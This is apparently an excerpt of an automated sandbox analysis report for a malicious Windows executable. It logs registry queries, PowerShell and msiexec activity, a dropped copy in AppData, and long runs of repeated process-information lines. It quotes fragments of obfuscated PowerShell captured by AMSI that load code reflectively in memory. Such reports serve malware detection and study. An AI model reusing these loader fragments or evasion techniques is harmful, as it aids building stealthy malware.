          Source: C:\Users\user\Desktop\87h216Snb7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: 87h216Snb7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000007.00000002.1537052858.0000000006DA5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: re.pdbht9$ source: powershell.exe, 00000007.00000002.1537052858.0000000006DA5000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000007.00000002.1541477424.0000000008E67000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Throed $Marveled $Overtagets), (Thuggish @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hydrotachymeter = [AppDomain]::CurrentDomain.GetAssemblies()$globa
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($heyday)), $Tiggede).DefineDynamicModule($Everyplace198, $false).DefineType($Picturelike, $Turritella, [System.MulticastDelegate])$Segm
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0070E9F9 push eax; mov dword ptr [esp], edx7_2_0070EA0C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_06F774D4 pushfd ; retf 7_2_06F774ED
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_06F70FC4 push es; iretd 7_2_06F70FC7
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_06F708E2 push ecx; ret 7_2_06F708E4
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_06F708ED push ecx; ret 7_2_06F708EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0303891E pushad ; iretd 11_2_0303891F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_03032D49 push 8BFFFFFFh; retf 11_2_03032D4F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_03038DDF push esp; iretd 11_2_03038DE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_03038C2F pushfd ; iretd 11_2_03038C30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232638AD push eax; retf 0022h11_2_232638B2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\87h216Snb7.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599891Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599641Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599532Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599407Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599282Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599172Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599063Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598938Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598813Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598688Jump to behavior
